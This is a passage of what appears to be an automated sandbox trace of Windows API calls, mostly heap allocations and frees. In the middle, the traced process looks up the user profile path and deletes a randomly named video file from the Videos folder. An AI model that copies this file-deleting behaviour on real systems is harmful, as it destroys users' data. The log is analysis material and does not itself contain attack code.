lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0257.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0257.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0257.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0257.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0257.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0257.182] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.182] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0257.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/4Qauyoz6.avi", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi", lpFilePart=0x8bedfc*="4Qauyoz6.avi") returned 0x31 [0257.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0257.184] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4qauyoz6.avi")) returned 0x20 [0257.184] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f1edd0, ftCreationTime.dwHighDateTime=0x1d4ca4c, ftLastAccessTime.dwLowDateTime=0xa3ba3090, ftLastAccessTime.dwHighDateTime=0x1d4d026, ftLastWriteTime.dwLowDateTime=0xa3ba3090, ftLastWriteTime.dwHighDateTime=0x1d4d026, nFileSizeHigh=0x0, nFileSizeLow=0xa6ab, dwReserved0=0x177c, dwReserved1=0x4, cFileName="4Qauyoz6.avi", cAlternateFileName="")) returned 0xaa5820 [0257.184] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4qauyoz6.avi")) returned 1 [0257.186] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f1edd0, ftCreationTime.dwHighDateTime=0x1d4ca4c, ftLastAccessTime.dwLowDateTime=0xa3ba3090, ftLastAccessTime.dwHighDateTime=0x1d4d026, ftLastWriteTime.dwLowDateTime=0xa3ba3090, ftLastWriteTime.dwHighDateTime=0x1d4d026, nFileSizeHigh=0x0, nFileSizeLow=0xa6ab, dwReserved0=0x177c, dwReserved1=0x4, cFileName="4Qauyoz6.avi", cAlternateFileName="")) returned 0 [0257.186] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0257.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.187] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0257.187] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0257.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.188] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0257.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0257.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0257.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/4Qauyoz6.avi", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi", lpFilePart=0x8bf658*="4Qauyoz6.avi") returned 0x31 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0257.190] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Qauyoz6.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4qauyoz6.avi")) returned 0xffffffff [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0257.190] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0257.190] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.190] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0257.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0257.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.191] RtlAllocateHeap 